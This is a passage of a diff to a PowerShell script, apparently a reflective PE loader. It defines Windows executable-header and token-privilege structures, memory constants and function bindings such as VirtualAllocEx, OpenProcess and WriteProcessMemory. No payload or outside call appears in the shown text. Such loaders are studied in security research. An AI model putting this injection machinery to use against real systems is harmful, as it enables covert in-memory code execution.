Out-Null - ($TypeBuilder.DefineField('MinorOperatingSystemVersion', [UInt16], 'Public')).SetOffset(42) | Out-Null - ($TypeBuilder.DefineField('MajorImageVersion', [UInt16], 'Public')).SetOffset(44) | Out-Null - ($TypeBuilder.DefineField('MinorImageVersion', [UInt16], 'Public')).SetOffset(46) | Out-Null - ($TypeBuilder.DefineField('MajorSubsystemVersion', [UInt16], 'Public')).SetOffset(48) | Out-Null - ($TypeBuilder.DefineField('MinorSubsystemVersion', [UInt16], 'Public')).SetOffset(50) | Out-Null - ($TypeBuilder.DefineField('Win32VersionValue', [UInt32], 'Public')).SetOffset(52) | Out-Null - ($TypeBuilder.DefineField('SizeOfImage', [UInt32], 'Public')).SetOffset(56) | Out-Null - ($TypeBuilder.DefineField('SizeOfHeaders', [UInt32], 'Public')).SetOffset(60) | Out-Null - ($TypeBuilder.DefineField('CheckSum', [UInt32], 'Public')).SetOffset(64) | Out-Null - ($TypeBuilder.DefineField('Subsystem', $SubSystemType, 'Public')).SetOffset(68) | Out-Null - ($TypeBuilder.DefineField('DllCharacteristics', $DllCharacteristicsType, 'Public')).SetOffset(70) | Out-Null - ($TypeBuilder.DefineField('SizeOfStackReserve', [UInt64], 'Public')).SetOffset(72) | Out-Null - ($TypeBuilder.DefineField('SizeOfStackCommit', [UInt64], 'Public')).SetOffset(80) | Out-Null - ($TypeBuilder.DefineField('SizeOfHeapReserve', [UInt64], 'Public')).SetOffset(88) | Out-Null - ($TypeBuilder.DefineField('SizeOfHeapCommit', [UInt64], 'Public')).SetOffset(96) | Out-Null - ($TypeBuilder.DefineField('LoaderFlags', [UInt32], 'Public')).SetOffset(104) | Out-Null - ($TypeBuilder.DefineField('NumberOfRvaAndSizes', [UInt32], 'Public')).SetOffset(108) | Out-Null - ($TypeBuilder.DefineField('ExportTable', $IMAGE_DATA_DIRECTORY, 'Public')).SetOffset(112) | Out-Null - ($TypeBuilder.DefineField('ImportTable', $IMAGE_DATA_DIRECTORY, 'Public')).SetOffset(120) | Out-Null - ($TypeBuilder.DefineField('ResourceTable', $IMAGE_DATA_DIRECTORY, 'Public')).SetOffset(128) | Out-Null - ($TypeBuilder.DefineField('ExceptionTable', $IMAGE_DATA_DIRECTORY, 'Public')).SetOffset(136) | Out-Null - ($TypeBuilder.DefineField('CertificateTable', $IMAGE_DATA_DIRECTORY, 'Public')).SetOffset(144) | Out-Null - ($TypeBuilder.DefineField('BaseRelocationTable', $IMAGE_DATA_DIRECTORY, 'Public')).SetOffset(152) | Out-Null - ($TypeBuilder.DefineField('Debug', $IMAGE_DATA_DIRECTORY, 'Public')).SetOffset(160) | Out-Null - ($TypeBuilder.DefineField('Architecture', $IMAGE_DATA_DIRECTORY, 'Public')).SetOffset(168) | Out-Null - ($TypeBuilder.DefineField('GlobalPtr', $IMAGE_DATA_DIRECTORY, 'Public')).SetOffset(176) | Out-Null - ($TypeBuilder.DefineField('TLSTable', $IMAGE_DATA_DIRECTORY, 'Public')).SetOffset(184) | Out-Null - ($TypeBuilder.DefineField('LoadConfigTable', $IMAGE_DATA_DIRECTORY, 'Public')).SetOffset(192) | Out-Null - ($TypeBuilder.DefineField('BoundImport', $IMAGE_DATA_DIRECTORY, 'Public')).SetOffset(200) | Out-Null - ($TypeBuilder.DefineField('IAT', $IMAGE_DATA_DIRECTORY, 'Public')).SetOffset(208) | Out-Null - ($TypeBuilder.DefineField('DelayImportDescriptor', $IMAGE_DATA_DIRECTORY, 'Public')).SetOffset(216) | Out-Null - ($TypeBuilder.DefineField('CLRRuntimeHeader', $IMAGE_DATA_DIRECTORY, 'Public')).SetOffset(224) | Out-Null - ($TypeBuilder.DefineField('Reserved', $IMAGE_DATA_DIRECTORY, 'Public')).SetOffset(232) | Out-Null - $IMAGE_OPTIONAL_HEADER64 = $TypeBuilder.CreateType() - $Win32Types | Add-Member -MemberType NoteProperty -Name IMAGE_OPTIONAL_HEADER64 -Value $IMAGE_OPTIONAL_HEADER64 - - #Struct IMAGE_OPTIONAL_HEADER32 - $Attributes = 'AutoLayout, AnsiClass, Class, Public, ExplicitLayout, Sealed, BeforeFieldInit' - $TypeBuilder = $ModuleBuilder.DefineType('IMAGE_OPTIONAL_HEADER32', $Attributes, [System.ValueType], 224) - ($TypeBuilder.DefineField('Magic', $MagicType, 'Public')).SetOffset(0) | Out-Null - ($TypeBuilder.DefineField('MajorLinkerVersion', [Byte], 'Public')).SetOffset(2) | Out-Null - ($TypeBuilder.DefineField('MinorLinkerVersion', [Byte], 'Public')).SetOffset(3) | Out-Null - ($TypeBuilder.DefineField('SizeOfCode', [UInt32], 'Public')).SetOffset(4) | Out-Null - ($TypeBuilder.DefineField('SizeOfInitializedData', [UInt32], 'Public')).SetOffset(8) | Out-Null - ($TypeBuilder.DefineField('SizeOfUninitializedData', [UInt32], 'Public')).SetOffset(12) | Out-Null - ($TypeBuilder.DefineField('AddressOfEntryPoint', [UInt32], 'Public')).SetOffset(16) | Out-Null - ($TypeBuilder.DefineField('BaseOfCode', [UInt32], 'Public')).SetOffset(20) | Out-Null - ($TypeBuilder.DefineField('BaseOfData', [UInt32], 'Public')).SetOffset(24) | Out-Null - ($TypeBuilder.DefineField('ImageBase', [UInt32], 'Public')).SetOffset(28) | Out-Null - ($TypeBuilder.DefineField('SectionAlignment', [UInt32], 'Public')).SetOffset(32) | Out-Null - ($TypeBuilder.DefineField('FileAlignment', [UInt32], 'Public')).SetOffset(36) | Out-Null - ($TypeBuilder.DefineField('MajorOperatingSystemVersion', [UInt16], 'Public')).SetOffset(40) | Out-Null - ($TypeBuilder.DefineField('MinorOperatingSystemVersion', [UInt16], 'Public')).SetOffset(42) | Out-Null - ($TypeBuilder.DefineField('MajorImageVersion', [UInt16], 'Public')).SetOffset(44) | Out-Null - ($TypeBuilder.DefineField('MinorImageVersion', [UInt16], 'Public')).SetOffset(46) | Out-Null - ($TypeBuilder.DefineField('MajorSubsystemVersion', [UInt16], 'Public')).SetOffset(48) | Out-Null - ($TypeBuilder.DefineField('MinorSubsystemVersion', [UInt16], 'Public')).SetOffset(50) | Out-Null - ($TypeBuilder.DefineField('Win32VersionValue', [UInt32], 'Public')).SetOffset(52) | Out-Null - ($TypeBuilder.DefineField('SizeOfImage', [UInt32], 'Public')).SetOffset(56) | Out-Null - ($TypeBuilder.DefineField('SizeOfHeaders', [UInt32], 'Public')).SetOffset(60) | Out-Null - ($TypeBuilder.DefineField('CheckSum', [UInt32], 'Public')).SetOffset(64) | Out-Null - ($TypeBuilder.DefineField('Subsystem', $SubSystemType, 'Public')).SetOffset(68) | Out-Null - ($TypeBuilder.DefineField('DllCharacteristics', $DllCharacteristicsType, 'Public')).SetOffset(70) | Out-Null - ($TypeBuilder.DefineField('SizeOfStackReserve', [UInt32], 'Public')).SetOffset(72) | Out-Null - ($TypeBuilder.DefineField('SizeOfStackCommit', [UInt32], 'Public')).SetOffset(76) | Out-Null - ($TypeBuilder.DefineField('SizeOfHeapReserve', [UInt32], 'Public')).SetOffset(80) | Out-Null - ($TypeBuilder.DefineField('SizeOfHeapCommit', [UInt32], 'Public')).SetOffset(84) | Out-Null - ($TypeBuilder.DefineField('LoaderFlags', [UInt32], 'Public')).SetOffset(88) | Out-Null - ($TypeBuilder.DefineField('NumberOfRvaAndSizes', [UInt32], 'Public')).SetOffset(92) | Out-Null - ($TypeBuilder.DefineField('ExportTable', $IMAGE_DATA_DIRECTORY, 'Public')).SetOffset(96) | Out-Null - ($TypeBuilder.DefineField('ImportTable', $IMAGE_DATA_DIRECTORY, 'Public')).SetOffset(104) | Out-Null - ($TypeBuilder.DefineField('ResourceTable', $IMAGE_DATA_DIRECTORY, 'Public')).SetOffset(112) | Out-Null - ($TypeBuilder.DefineField('ExceptionTable', $IMAGE_DATA_DIRECTORY, 'Public')).SetOffset(120) | Out-Null - ($TypeBuilder.DefineField('CertificateTable', $IMAGE_DATA_DIRECTORY, 'Public')).SetOffset(128) | Out-Null - ($TypeBuilder.DefineField('BaseRelocationTable', $IMAGE_DATA_DIRECTORY, 'Public')).SetOffset(136) | Out-Null - ($TypeBuilder.DefineField('Debug', $IMAGE_DATA_DIRECTORY, 'Public')).SetOffset(144) | Out-Null - ($TypeBuilder.DefineField('Architecture', $IMAGE_DATA_DIRECTORY, 'Public')).SetOffset(152) | Out-Null - ($TypeBuilder.DefineField('GlobalPtr', $IMAGE_DATA_DIRECTORY, 'Public')).SetOffset(160) | Out-Null - ($TypeBuilder.DefineField('TLSTable', $IMAGE_DATA_DIRECTORY, 'Public')).SetOffset(168) | Out-Null - ($TypeBuilder.DefineField('LoadConfigTable', $IMAGE_DATA_DIRECTORY, 'Public')).SetOffset(176) | Out-Null - ($TypeBuilder.DefineField('BoundImport', $IMAGE_DATA_DIRECTORY, 'Public')).SetOffset(184) | Out-Null - ($TypeBuilder.DefineField('IAT', $IMAGE_DATA_DIRECTORY, 'Public')).SetOffset(192) | Out-Null - ($TypeBuilder.DefineField('DelayImportDescriptor', $IMAGE_DATA_DIRECTORY, 'Public')).SetOffset(200) | Out-Null - ($TypeBuilder.DefineField('CLRRuntimeHeader', $IMAGE_DATA_DIRECTORY, 'Public')).SetOffset(208) | Out-Null - ($TypeBuilder.DefineField('Reserved', $IMAGE_DATA_DIRECTORY, 'Public')).SetOffset(216) | Out-Null - $IMAGE_OPTIONAL_HEADER32 = $TypeBuilder.CreateType() - $Win32Types | Add-Member -MemberType NoteProperty -Name IMAGE_OPTIONAL_HEADER32 -Value $IMAGE_OPTIONAL_HEADER32 - - #Struct IMAGE_NT_HEADERS64 - $Attributes = 'AutoLayout, AnsiClass, Class, Public, SequentialLayout, Sealed, BeforeFieldInit' - $TypeBuilder = $ModuleBuilder.DefineType('IMAGE_NT_HEADERS64', $Attributes, [System.ValueType], 264) - $TypeBuilder.DefineField('Signature', [UInt32], 'Public') | Out-Null - $TypeBuilder.DefineField('FileHeader', $IMAGE_FILE_HEADER, 'Public') | Out-Null - $TypeBuilder.DefineField('OptionalHeader', $IMAGE_OPTIONAL_HEADER64, 'Public') | Out-Null - $IMAGE_NT_HEADERS64 = $TypeBuilder.CreateType() - $Win32Types | Add-Member -MemberType NoteProperty -Name IMAGE_NT_HEADERS64 -Value $IMAGE_NT_HEADERS64 - - #Struct IMAGE_NT_HEADERS32 - $Attributes = 'AutoLayout, AnsiClass, Class, Public, SequentialLayout, Sealed, BeforeFieldInit' - $TypeBuilder = $ModuleBuilder.DefineType('IMAGE_NT_HEADERS32', $Attributes, [System.ValueType], 248) - $TypeBuilder.DefineField('Signature', [UInt32], 'Public') | Out-Null - $TypeBuilder.DefineField('FileHeader', $IMAGE_FILE_HEADER, 'Public') | Out-Null - $TypeBuilder.DefineField('OptionalHeader', $IMAGE_OPTIONAL_HEADER32, 'Public') | Out-Null - $IMAGE_NT_HEADERS32 = $TypeBuilder.CreateType() - $Win32Types | Add-Member -MemberType NoteProperty -Name IMAGE_NT_HEADERS32 -Value $IMAGE_NT_HEADERS32 - - #Struct IMAGE_DOS_HEADER - $Attributes = 'AutoLayout, AnsiClass, Class, Public, SequentialLayout, Sealed, BeforeFieldInit' - $TypeBuilder = $ModuleBuilder.DefineType('IMAGE_DOS_HEADER', $Attributes, [System.ValueType], 64) - $TypeBuilder.DefineField('e_magic', [UInt16], 'Public') | Out-Null - $TypeBuilder.DefineField('e_cblp', [UInt16], 'Public') | Out-Null - $TypeBuilder.DefineField('e_cp', [UInt16], 'Public') | Out-Null - $TypeBuilder.DefineField('e_crlc', [UInt16], 'Public') | Out-Null - $TypeBuilder.DefineField('e_cparhdr', [UInt16], 'Public') | Out-Null - $TypeBuilder.DefineField('e_minalloc', [UInt16], 'Public') | Out-Null - $TypeBuilder.DefineField('e_maxalloc', [UInt16], 'Public') | Out-Null - $TypeBuilder.DefineField('e_ss', [UInt16], 'Public') | Out-Null - $TypeBuilder.DefineField('e_sp', [UInt16], 'Public') | Out-Null - $TypeBuilder.DefineField('e_csum', [UInt16], 'Public') | Out-Null - $TypeBuilder.DefineField('e_ip', [UInt16], 'Public') | Out-Null - $TypeBuilder.DefineField('e_cs', [UInt16], 'Public') | Out-Null - $TypeBuilder.DefineField('e_lfarlc', [UInt16], 'Public') | Out-Null - $TypeBuilder.DefineField('e_ovno', [UInt16], 'Public') | Out-Null - - $e_resField = $TypeBuilder.DefineField('e_res', [UInt16[]], 'Public, HasFieldMarshal') - $ConstructorValue = [System.Runtime.InteropServices.UnmanagedType]::ByValArray - $FieldArray = @([System.Runtime.InteropServices.MarshalAsAttribute].GetField('SizeConst')) - $AttribBuilder = New-Object System.Reflection.Emit.CustomAttributeBuilder($ConstructorInfo, $ConstructorValue, $FieldArray, @([Int32] 4)) - $e_resField.SetCustomAttribute($AttribBuilder) - - $TypeBuilder.DefineField('e_oemid', [UInt16], 'Public') | Out-Null - $TypeBuilder.DefineField('e_oeminfo', [UInt16], 'Public') | Out-Null - - $e_res2Field = $TypeBuilder.DefineField('e_res2', [UInt16[]], 'Public, HasFieldMarshal') - $ConstructorValue = [System.Runtime.InteropServices.UnmanagedType]::ByValArray - $AttribBuilder = New-Object System.Reflection.Emit.CustomAttributeBuilder($ConstructorInfo, $ConstructorValue, $FieldArray, @([Int32] 10)) - $e_res2Field.SetCustomAttribute($AttribBuilder) - - $TypeBuilder.DefineField('e_lfanew', [Int32], 'Public') | Out-Null - $IMAGE_DOS_HEADER = $TypeBuilder.CreateType() - $Win32Types | Add-Member -MemberType NoteProperty -Name IMAGE_DOS_HEADER -Value $IMAGE_DOS_HEADER - - #Struct IMAGE_SECTION_HEADER - $Attributes = 'AutoLayout, AnsiClass, Class, Public, SequentialLayout, Sealed, BeforeFieldInit' - $TypeBuilder = $ModuleBuilder.DefineType('IMAGE_SECTION_HEADER', $Attributes, [System.ValueType], 40) - - $nameField = $TypeBuilder.DefineField('Name', [Char[]], 'Public, HasFieldMarshal') - $ConstructorValue = [System.Runtime.InteropServices.UnmanagedType]::ByValArray - $AttribBuilder = New-Object System.Reflection.Emit.CustomAttributeBuilder($ConstructorInfo, $ConstructorValue, $FieldArray, @([Int32] 8)) - $nameField.SetCustomAttribute($AttribBuilder) - - $TypeBuilder.DefineField('VirtualSize', [UInt32], 'Public') | Out-Null - $TypeBuilder.DefineField('VirtualAddress', [UInt32], 'Public') | Out-Null - $TypeBuilder.DefineField('SizeOfRawData', [UInt32], 'Public') | Out-Null - $TypeBuilder.DefineField('PointerToRawData', [UInt32], 'Public') | Out-Null - $TypeBuilder.DefineField('PointerToRelocations', [UInt32], 'Public') | Out-Null - $TypeBuilder.DefineField('PointerToLinenumbers', [UInt32], 'Public') | Out-Null - $TypeBuilder.DefineField('NumberOfRelocations', [UInt16], 'Public') | Out-Null - $TypeBuilder.DefineField('NumberOfLinenumbers', [UInt16], 'Public') | Out-Null - $TypeBuilder.DefineField('Characteristics', [UInt32], 'Public') | Out-Null - $IMAGE_SECTION_HEADER = $TypeBuilder.CreateType() - $Win32Types | Add-Member -MemberType NoteProperty -Name IMAGE_SECTION_HEADER -Value $IMAGE_SECTION_HEADER - - #Struct IMAGE_BASE_RELOCATION - $Attributes = 'AutoLayout, AnsiClass, Class, Public, SequentialLayout, Sealed, BeforeFieldInit' - $TypeBuilder = $ModuleBuilder.DefineType('IMAGE_BASE_RELOCATION', $Attributes, [System.ValueType], 8) - $TypeBuilder.DefineField('VirtualAddress', [UInt32], 'Public') | Out-Null - $TypeBuilder.DefineField('SizeOfBlock', [UInt32], 'Public') | Out-Null - $IMAGE_BASE_RELOCATION = $TypeBuilder.CreateType() - $Win32Types | Add-Member -MemberType NoteProperty -Name IMAGE_BASE_RELOCATION -Value $IMAGE_BASE_RELOCATION - - #Struct IMAGE_IMPORT_DESCRIPTOR - $Attributes = 'AutoLayout, AnsiClass, Class, Public, SequentialLayout, Sealed, BeforeFieldInit' - $TypeBuilder = $ModuleBuilder.DefineType('IMAGE_IMPORT_DESCRIPTOR', $Attributes, [System.ValueType], 20) - $TypeBuilder.DefineField('Characteristics', [UInt32], 'Public') | Out-Null - $TypeBuilder.DefineField('TimeDateStamp', [UInt32], 'Public') | Out-Null - $TypeBuilder.DefineField('ForwarderChain', [UInt32], 'Public') | Out-Null - $TypeBuilder.DefineField('Name', [UInt32], 'Public') | Out-Null - $TypeBuilder.DefineField('FirstThunk', [UInt32], 'Public') | Out-Null - $IMAGE_IMPORT_DESCRIPTOR = $TypeBuilder.CreateType() - $Win32Types | Add-Member -MemberType NoteProperty -Name IMAGE_IMPORT_DESCRIPTOR -Value $IMAGE_IMPORT_DESCRIPTOR - - #Struct IMAGE_EXPORT_DIRECTORY - $Attributes = 'AutoLayout, AnsiClass, Class, Public, SequentialLayout, Sealed, BeforeFieldInit' - $TypeBuilder = $ModuleBuilder.DefineType('IMAGE_EXPORT_DIRECTORY', $Attributes, [System.ValueType], 40) - $TypeBuilder.DefineField('Characteristics', [UInt32], 'Public') | Out-Null - $TypeBuilder.DefineField('TimeDateStamp', [UInt32], 'Public') | Out-Null - $TypeBuilder.DefineField('MajorVersion', [UInt16], 'Public') | Out-Null - $TypeBuilder.DefineField('MinorVersion', [UInt16], 'Public') | Out-Null - $TypeBuilder.DefineField('Name', [UInt32], 'Public') | Out-Null - $TypeBuilder.DefineField('Base', [UInt32], 'Public') | Out-Null - $TypeBuilder.DefineField('NumberOfFunctions', [UInt32], 'Public') | Out-Null - $TypeBuilder.DefineField('NumberOfNames', [UInt32], 'Public') | Out-Null - $TypeBuilder.DefineField('AddressOfFunctions', [UInt32], 'Public') | Out-Null - $TypeBuilder.DefineField('AddressOfNames', [UInt32], 'Public') | Out-Null - $TypeBuilder.DefineField('AddressOfNameOrdinals', [UInt32], 'Public') | Out-Null - $IMAGE_EXPORT_DIRECTORY = $TypeBuilder.CreateType() - $Win32Types | Add-Member -MemberType NoteProperty -Name IMAGE_EXPORT_DIRECTORY -Value $IMAGE_EXPORT_DIRECTORY - - #Struct LUID - $Attributes = 'AutoLayout, AnsiClass, Class, Public, SequentialLayout, Sealed, BeforeFieldInit' - $TypeBuilder = $ModuleBuilder.DefineType('LUID', $Attributes, [System.ValueType], 8) - $TypeBuilder.DefineField('LowPart', [UInt32], 'Public') | Out-Null - $TypeBuilder.DefineField('HighPart', [UInt32], 'Public') | Out-Null - $LUID = $TypeBuilder.CreateType() - $Win32Types | Add-Member -MemberType NoteProperty -Name LUID -Value $LUID - - #Struct LUID_AND_ATTRIBUTES - $Attributes = 'AutoLayout, AnsiClass, Class, Public, SequentialLayout, Sealed, BeforeFieldInit' - $TypeBuilder = $ModuleBuilder.DefineType('LUID_AND_ATTRIBUTES', $Attributes, [System.ValueType], 12) - $TypeBuilder.DefineField('Luid', $LUID, 'Public') | Out-Null - $TypeBuilder.DefineField('Attributes', [UInt32], 'Public') | Out-Null - $LUID_AND_ATTRIBUTES = $TypeBuilder.CreateType() - $Win32Types | Add-Member -MemberType NoteProperty -Name LUID_AND_ATTRIBUTES -Value $LUID_AND_ATTRIBUTES - - #Struct TOKEN_PRIVILEGES - $Attributes = 'AutoLayout, AnsiClass, Class, Public, SequentialLayout, Sealed, BeforeFieldInit' - $TypeBuilder = $ModuleBuilder.DefineType('TOKEN_PRIVILEGES', $Attributes, [System.ValueType], 16) - $TypeBuilder.DefineField('PrivilegeCount', [UInt32], 'Public') | Out-Null - $TypeBuilder.DefineField('Privileges', $LUID_AND_ATTRIBUTES, 'Public') | Out-Null - $TOKEN_PRIVILEGES = $TypeBuilder.CreateType() - $Win32Types | Add-Member -MemberType NoteProperty -Name TOKEN_PRIVILEGES -Value $TOKEN_PRIVILEGES - - return $Win32Types - } - - Function Get-Win32Constants - { - $Win32Constants = New-Object System.Object - - $Win32Constants | Add-Member -MemberType NoteProperty -Name MEM_COMMIT -Value 0x00001000 - $Win32Constants | Add-Member -MemberType NoteProperty -Name MEM_RESERVE -Value 0x00002000 - $Win32Constants | Add-Member -MemberType NoteProperty -Name PAGE_NOACCESS -Value 0x01 - $Win32Constants | Add-Member -MemberType NoteProperty -Name PAGE_READONLY -Value 0x02 - $Win32Constants | Add-Member -MemberType NoteProperty -Name PAGE_READWRITE -Value 0x04 - $Win32Constants | Add-Member -MemberType NoteProperty -Name PAGE_WRITECOPY -Value 0x08 - $Win32Constants | Add-Member -MemberType NoteProperty -Name PAGE_EXECUTE -Value 0x10 - $Win32Constants | Add-Member -MemberType NoteProperty -Name PAGE_EXECUTE_READ -Value 0x20 - $Win32Constants | Add-Member -MemberType NoteProperty -Name PAGE_EXECUTE_READWRITE -Value 0x40 - $Win32Constants | Add-Member -MemberType NoteProperty -Name PAGE_EXECUTE_WRITECOPY -Value 0x80 - $Win32Constants | Add-Member -MemberType NoteProperty -Name PAGE_NOCACHE -Value 0x200 - $Win32Constants | Add-Member -MemberType NoteProperty -Name IMAGE_REL_BASED_ABSOLUTE -Value 0 - $Win32Constants | Add-Member -MemberType NoteProperty -Name IMAGE_REL_BASED_HIGHLOW -Value 3 - $Win32Constants | Add-Member -MemberType NoteProperty -Name IMAGE_REL_BASED_DIR64 -Value 10 - $Win32Constants | Add-Member -MemberType NoteProperty -Name IMAGE_SCN_MEM_DISCARDABLE -Value 0x02000000 - $Win32Constants | Add-Member -MemberType NoteProperty -Name IMAGE_SCN_MEM_EXECUTE -Value 0x20000000 - $Win32Constants | Add-Member -MemberType NoteProperty -Name IMAGE_SCN_MEM_READ -Value 0x40000000 - $Win32Constants | Add-Member -MemberType NoteProperty -Name IMAGE_SCN_MEM_WRITE -Value 0x80000000 - $Win32Constants | Add-Member -MemberType NoteProperty -Name IMAGE_SCN_MEM_NOT_CACHED -Value 0x04000000 - $Win32Constants | Add-Member -MemberType NoteProperty -Name MEM_DECOMMIT -Value 0x4000 - $Win32Constants | Add-Member -MemberType NoteProperty -Name IMAGE_FILE_EXECUTABLE_IMAGE -Value 0x0002 - $Win32Constants | Add-Member -MemberType NoteProperty -Name IMAGE_FILE_DLL -Value 0x2000 - $Win32Constants | Add-Member -MemberType NoteProperty -Name IMAGE_DLLCHARACTERISTICS_DYNAMIC_BASE -Value 0x40 - $Win32Constants | Add-Member -MemberType NoteProperty -Name IMAGE_DLLCHARACTERISTICS_NX_COMPAT -Value 0x100 - $Win32Constants | Add-Member -MemberType NoteProperty -Name MEM_RELEASE -Value 0x8000 - $Win32Constants | Add-Member -MemberType NoteProperty -Name TOKEN_QUERY -Value 0x0008 - $Win32Constants | Add-Member -MemberType NoteProperty -Name TOKEN_ADJUST_PRIVILEGES -Value 0x0020 - $Win32Constants | Add-Member -MemberType NoteProperty -Name SE_PRIVILEGE_ENABLED -Value 0x2 - $Win32Constants | Add-Member -MemberType NoteProperty -Name ERROR_NO_TOKEN -Value 0x3f0 - - return $Win32Constants - } - - Function Get-Win32Functions - { - $Win32Functions = New-Object System.Object - - $VirtualAllocAddr = Get-ProcAddress kernel32.dll VirtualAlloc - $VirtualAllocDelegate = Get-DelegateType @([IntPtr], [UIntPtr], [UInt32], [UInt32]) ([IntPtr]) - $VirtualAlloc = [System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($VirtualAllocAddr, $VirtualAllocDelegate) - $Win32Functions | Add-Member NoteProperty -Name VirtualAlloc -Value $VirtualAlloc - - $VirtualAllocExAddr = Get-ProcAddress kernel32.dll VirtualAllocEx - $VirtualAllocExDelegate = Get-DelegateType @([IntPtr], [IntPtr], [UIntPtr], [UInt32], [UInt32]) ([IntPtr]) - $VirtualAllocEx = [System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($VirtualAllocExAddr, $VirtualAllocExDelegate) - $Win32Functions | Add-Member NoteProperty -Name VirtualAllocEx -Value $VirtualAllocEx - - $memcpyAddr = Get-ProcAddress msvcrt.dll memcpy - $memcpyDelegate = Get-DelegateType @([IntPtr], [IntPtr], [UIntPtr]) ([IntPtr]) - $memcpy = [System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($memcpyAddr, $memcpyDelegate) - $Win32Functions | Add-Member -MemberType NoteProperty -Name memcpy -Value $memcpy - - $memsetAddr = Get-ProcAddress msvcrt.dll memset - $memsetDelegate = Get-DelegateType @([IntPtr], [Int32], [IntPtr]) ([IntPtr]) - $memset = [System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($memsetAddr, $memsetDelegate) - $Win32Functions | Add-Member -MemberType NoteProperty -Name memset -Value $memset - - $LoadLibraryAddr = Get-ProcAddress kernel32.dll LoadLibraryA - $LoadLibraryDelegate = Get-DelegateType @([String]) ([IntPtr]) - $LoadLibrary = [System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($LoadLibraryAddr, $LoadLibraryDelegate) - $Win32Functions | Add-Member -MemberType NoteProperty -Name LoadLibrary -Value $LoadLibrary - - $GetProcAddressAddr = Get-ProcAddress kernel32.dll GetProcAddress - $GetProcAddressDelegate = Get-DelegateType @([IntPtr], [String]) ([IntPtr]) - $GetProcAddress = [System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($GetProcAddressAddr, $GetProcAddressDelegate) - $Win32Functions | Add-Member -MemberType NoteProperty -Name GetProcAddress -Value $GetProcAddress - - $GetProcAddressIntPtrAddr = Get-ProcAddress kernel32.dll GetProcAddress #This is still GetProcAddress, but instead of PowerShell converting the string to a pointer, you must do it yourself - $GetProcAddressIntPtrDelegate = Get-DelegateType @([IntPtr], [IntPtr]) ([IntPtr]) - $GetProcAddressIntPtr = [System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($GetProcAddressIntPtrAddr, $GetProcAddressIntPtrDelegate) - $Win32Functions | Add-Member -MemberType NoteProperty -Name GetProcAddressIntPtr -Value $GetProcAddressIntPtr - - $VirtualFreeAddr = Get-ProcAddress kernel32.dll VirtualFree - $VirtualFreeDelegate = Get-DelegateType @([IntPtr], [UIntPtr], [UInt32]) ([Bool]) - $VirtualFree = [System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($VirtualFreeAddr, $VirtualFreeDelegate) - $Win32Functions | Add-Member NoteProperty -Name VirtualFree -Value $VirtualFree - - $VirtualFreeExAddr = Get-ProcAddress kernel32.dll VirtualFreeEx - $VirtualFreeExDelegate = Get-DelegateType @([IntPtr], [IntPtr], [UIntPtr], [UInt32]) ([Bool]) - $VirtualFreeEx = [System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($VirtualFreeExAddr, $VirtualFreeExDelegate) - $Win32Functions | Add-Member NoteProperty -Name VirtualFreeEx -Value $VirtualFreeEx - - $VirtualProtectAddr = Get-ProcAddress kernel32.dll VirtualProtect - $VirtualProtectDelegate = Get-DelegateType @([IntPtr], [UIntPtr], [UInt32], [UInt32].MakeByRefType()) ([Bool]) - $VirtualProtect = [System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($VirtualProtectAddr, $VirtualProtectDelegate) - $Win32Functions | Add-Member NoteProperty -Name VirtualProtect -Value $VirtualProtect - - $GetModuleHandleAddr = Get-ProcAddress kernel32.dll GetModuleHandleA - $GetModuleHandleDelegate = Get-DelegateType @([String]) ([IntPtr]) - $GetModuleHandle = [System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($GetModuleHandleAddr, $GetModuleHandleDelegate) - $Win32Functions | Add-Member NoteProperty -Name GetModuleHandle -Value $GetModuleHandle - - $FreeLibraryAddr = Get-ProcAddress kernel32.dll FreeLibrary - $FreeLibraryDelegate = Get-DelegateType @([IntPtr]) ([Bool]) - $FreeLibrary = [System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($FreeLibraryAddr, $FreeLibraryDelegate) - $Win32Functions | Add-Member -MemberType NoteProperty -Name FreeLibrary -Value $FreeLibrary - - $OpenProcessAddr = Get-ProcAddress kernel32.dll OpenProcess - $OpenProcessDelegate = Get-DelegateType @([UInt32], [Bool], [UInt32]) ([IntPtr]) - $OpenProcess = [System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($OpenProcessAddr, $OpenProcessDelegate) - $Win32Functions | Add-Member -MemberType NoteProperty -Name OpenProcess -Value $OpenProcess - - $WaitForSingleObjectAddr = Get-ProcAddress kernel32.dll WaitForSingleObject - $WaitForSingleObjectDelegate = Get-DelegateType @([IntPtr], [UInt32]) ([UInt32]) - $WaitForSingleObject = [System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($WaitForSingleObjectAddr, $WaitForSingleObjectDelegate) - $Win32Functions | Add-Member -MemberType NoteProperty -Name WaitForSingleObject -Value $WaitForSingleObject - - $WriteProcessMemoryAddr = Get-ProcAddress kernel32.dll WriteProcessMemory + ) + + ################################### + ########## Win32 Stuff ########## + ################################### + Function Get-Win32Types + { + $Win32Types = New-Object System.Object + + #Define all the structures/enums that will be used + # This article shows you how to do this with reflection: http://www.exploit-monday.com/2012/07/structs-and-enums-using-reflection.html + $Domain = [AppDomain]::CurrentDomain + $DynamicAssembly = New-Object System.Reflection.AssemblyName('DynamicAssembly') + $AssemblyBuilder = $Domain.DefineDynamicAssembly($DynamicAssembly, [System.Reflection.Emit.AssemblyBuilderAccess]::Run) + $ModuleBuilder = $AssemblyBuilder.DefineDynamicModule('DynamicModule', $false) + $ConstructorInfo = [System.Runtime.InteropServices.MarshalAsAttribute].GetConstructors()[0] + + + ############ ENUM ############ + #Enum MachineType + $TypeBuilder = $ModuleBuilder.DefineEnum('MachineType', 'Public', [UInt16]) + $TypeBuilder.DefineLiteral('Native', [UInt16] 0) | Out-Null + $TypeBuilder.DefineLiteral('I386', [UInt16] 0x014c) | Out-Null + $TypeBuilder.DefineLiteral('Itanium', [UInt16] 0x0200) | Out-Null + $TypeBuilder.DefineLiteral('x64', [UInt16] 0x8664) | Out-Null + $MachineType = $TypeBuilder.CreateType() + $Win32Types | Add-Member -MemberType 